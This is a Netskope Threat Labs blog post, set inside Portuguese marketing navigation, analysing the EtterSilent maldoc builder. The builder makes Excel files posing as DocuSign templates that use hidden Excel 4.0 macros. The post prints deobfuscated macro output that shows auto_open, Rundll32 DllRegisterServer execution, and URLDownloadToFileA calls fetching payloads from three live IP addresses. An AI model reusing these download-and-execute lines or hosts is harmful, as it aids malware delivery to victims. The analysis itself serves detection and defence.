A Netskope foi nomeada Líder no Quadrante Mágico do Gartner™ de 2022 para Security Service Edge. Obtenha o Relatório

  • Produtos

    Os produtos Netskope são construídos na Netskope Security Cloud.

  • Plataforma

    Visibilidade incomparável e proteção de dados e contra ameaças em tempo real na maior nuvem privada de segurança do mundo.

Netskope é nomeada Líder no Relatório do Quadrante Mágico™ do Gartner de 2022 para SSE

Obtenha o Relatório Vá para a plataforma
Netskope gartner mq 2022 sse leader

A Netskope oferece uma pilha de segurança na nuvem moderna, com capacidade unificada para proteção de dados e ameaças, além de acesso privado seguro.

Explore a nossa plataforma
Birds eye view metropolitan city

Mude para serviços de segurança na nuvem líderes de mercado com latência mínima e alta confiabilidade.

Saiba mais
Lighted highway through mountainside switchbacks

Previna ameaças que muitas vezes contornam outras soluções de segurança usando uma estrutura SSE de passagem única.

Saiba mais
Lighting storm over metropolitan area

Soluções de zero trust para a implementação de SSE e SASE

Saiba mais
Boat driving through open sea

A Netskope permite uma jornada segura, inteligente e rápida para a adoção de serviços em nuvem, aplicações e infraestrutura de nuvem pública.

Saiba mais
Wind turbines along cliffside
  • Customer Success

    Proteja a sua jornada de transformação digital e aproveite ao máximo as suas aplicações na nuvem, na web e privadas.

  • Atendimento ao cliente

    Suporte proativo e o compromisso em otimizar seu ambiente da Netskope e acelerar seu sucesso.

  • Treinamento e certificação

    Os treinamentos da Netskope vão ajudar você a ser um especialista em segurança na nuvem.

Confie na Netskope para ajudar você a enfrentar ameaças emergentes, novos riscos, mudanças tecnológicas, mudanças organizacionais e de rede, e novos requisitos regulatórios.

Saiba mais
Woman smiling with glasses looking out window

Contamos com engenheiros qualificados no mundo todo, com experiências variadas em segurança na nuvem, redes, virtualização, entrega de conteúdo e desenvolvimento de software, prontos para prestar assistência técnica oportuna e de alta qualidade.

Saiba mais Portal de Suporte
Bearded man wearing headset working on computer

Proteja sua jornada de transformação digital e aproveite ao máximo seus aplicativos de nuvem, web e privados com o treinamento da Netskope.

Saiba mais
Group of young professionals working
  • Recursos

    Saiba mais sobre como a Netskope pode ajudá-lo a proteger sua jornada para a nuvem.

  • Blog

    Saiba como a Netskope viabiliza a segurança e a transformação de redes através do security service edge (SSE).

  • Eventos e workshops

    Esteja atualizado sobre as últimas tendências de segurança e conecte-se com seus pares.

  • Security Defined

    Tudo o que você precisa saber em nossa enciclopédia de segurança cibernética.

Podcast Security Visionaries

Episode 11: Empowering People for a Secure Future

Reproduzir o podcast
Black man sitting in conference meeting

Leia as últimas novidades sobre como a Netskope pode viabilizar a jornada Zero Trust e SASE por meio dos recursos do security service edge (SSE).

Leia o Blog
Sunrise and cloudy sky

SASE Week

Netskope is positioned to help you begin your journey and discover where Security, Networking, and Zero Trust fit in the SASE world.

Saiba mais
SASE Week

O que é o Security Service Edge?

Explore o lado de segurança de SASE, o futuro da rede e proteção na nuvem.

Saiba mais
Four-way roundabout
  • Empresa

    Ajudamos você a antecipar os desafios da nuvem, dos dados e da segurança da rede.

  • Por que Netskope

    A transformação da nuvem e o trabalho em qualquer lugar mudaram a forma como a segurança precisa funcionar.

  • Liderança

    Nossa equipe de liderança está fortemente comprometida em fazer tudo o que for preciso para tornar nossos clientes bem-sucedidos.

  • Parceiros

    Fazemos parceria com líderes de segurança para ajudá-lo a proteger sua jornada para a nuvem.

A Netskope possibilita o futuro do trabalho.

Saiba mais
Curvy road through wooded area

A Netskope está redefinindo a nuvem, os dados e a segurança da rede para ajudar as organizações a aplicar os princípios de Zero Trust para proteger os dados.

Saiba mais
Switchback road atop a cliffside

Pensadores, construtores, sonhadores, inovadores. Juntos, fornecemos soluções de segurança na nuvem de última geração para ajudar nossos clientes a proteger seus dados e seu pessoal.

Meet our team
Group of hikers scaling a snowy mountain

A estratégia de comercialização da Netskope, focada em Parcerias, permite que nossos Parceiros maximizem seu crescimento e lucratividade enquanto transformam a segurança corporativa.

Saiba mais
Group of diverse young professionals smiling
Blog Threat Labs Cobertura contra ameaças da Netskope: EtterSilent
Apr 14 2021

Netskope Threat Coverage: EtterSilent

Co-authored by Dagmawi Mulugeta and Ghanashyam Satpathy

Summary

Intel 471 researchers have identified a new malicious document builder, dubbed “EtterSilent,” leveraged by various threat actor groups. One of the build options is a weaponized Microsoft Office document (maldoc) that uses malicious macros to download and execute an externally hosted payload. The maldocs pose as templates for DocuSign, a cloud-based electronic signature service. Attackers aim to capitalize on the popularity of DocuSign and the trust that victims may place on inbound DocuSign emails. Mimicking popular cloud services and using maldocs for malware delivery are common tactics used by cybercriminals. Maldocs account for 20% of malicious content detected on the Netskope Security Cloud platform.

EtterSilent was used in a recent Trickbot campaign where the maldoc was attached in an email that pretended to be a payment invoice posing as Docusign or Digicert document. On March 19, 2021, Intel 471 identified that EtterSilent was used as part of a Bazar loader campaign to download the Bazar backdoor. Other banking trojans—IcedId, BokBot, Gozi ISFB, and Qakbot/QBot—have also used EtterSilent in conjunction with their schemes. The researchers outline that as the builder has grown in popularity, it is constantly updated to avoid detection. 

Threat

EtterSilent uses Excel 4.0 macros stored inside a hidden sheet, instead of VBA macros. A screenshot of one sample (2baf563da8db9e2ed765fa7697025d277d06ee53424f6513671f2f6b7441387b) from Intel 471’s blog can be seen below, prompting victims to click “Enable Content” and run the malicious macro code.

Screenshot of one sample excel sheet from Intel 471 blog.

A cell from the sample sheet containing some malicious Excel 4.0 macro code can be seen in the screenshot below.

A cell from the sample sheet containing some malicious Excel 4.0 macro code.

A partial evaluation and deobfuscation of the Excel macro reveals references to Rundll32and the RegisterServer API, as well as downloads of additional malicious payloads.

[Loading Cells]
auto_open: auto_open->sheet1!$AO$168
[Starting Deobfuscation]
CELL:AO262     , FullEvaluation      , "2021-04-13 11:33:34.016878.dat"
CELL:AO264     , FullEvaluation      , FORMULA("Rundll32 ",AP264)
CELL:AO265     , FullEvaluation      , FORMULA(",DllRegisterServer",AP265)
CELL:AO271     , FullEvaluation      , "REGISTER(""U""&AL99&AL100&AK117&AL110&AL104,""U""&AL99&AL100&AL101&AL102&AL103&AL104&AL105&AL106&AL107&AL108&AL109&AL110&AL111&AL112&AL113&AL114&AL115,AK105&AK106&AK107&AK108&AK109&AK110,AK112,,1.0,9.0)"
CELL:AO272     , PartialEvaluation   , URLMon.URLDownloadToFileA(0,"http://188.127.254.114/2021-04-13 11:33:34.016878.dat","..\SOT.GOT",0,0)
CELL:AO273     , PartialEvaluation   , URLMon.URLDownloadToFileA(0,"http://185.82.219.160/2021-04-13 11:33:34.016878.dat","..\SOT.GOT1",0,0)
CELL:AO274     , PartialEvaluation   , URLMon.URLDownloadToFileA(0,"http://45.140.146.34/2021-04-13 11:33:34.016878.dat","..\SOT.GOT2",0,0)
Error: Cell addresss, Syntax Error
[END of Deobfuscation]

Protection

Netskope Advanced Threat Protection provides proactive coverage against maldocs using multiple layers of protection, including signature-based detection, a custom Microsoft Office analyzer, and a cloud sandbox to detect both existing and novel maldoc threats.

  • Gen.Malware.Detect.By.Sandbox indicates a sample that was detected by Netskope’s cloud sandbox
  • Gen.Malware.Detect.By.StHeur indicates a sample that was detected by one of Netskope’s static analysis engines 
  • Gen.Malware.Detect.By.StHeur.MsOffice indicates a sample that was detected by Netskope’s static ML Microsoft Office analyzer engine

Netskope Threat Labs is actively monitoring threats that use malicious Office documents and will continue to provide updates on this threat as it evolves. A full list of IOCs can be found in Intel 471’s blog post.

author image
About the author
Dagmawi Mulugeta is a security researcher with interests in cloud security, incident analysis & prediction, exploit development, and large-scale data analysis. He currently focuses on the abuse of cloud apps and analysis of threat actors in the cloud.
Dagmawi Mulugeta is a security researcher with interests in cloud security, incident analysis & prediction, exploit development, and large-scale data analysis. He currently focuses on the abuse of cloud apps and analysis of threat actors in the cloud.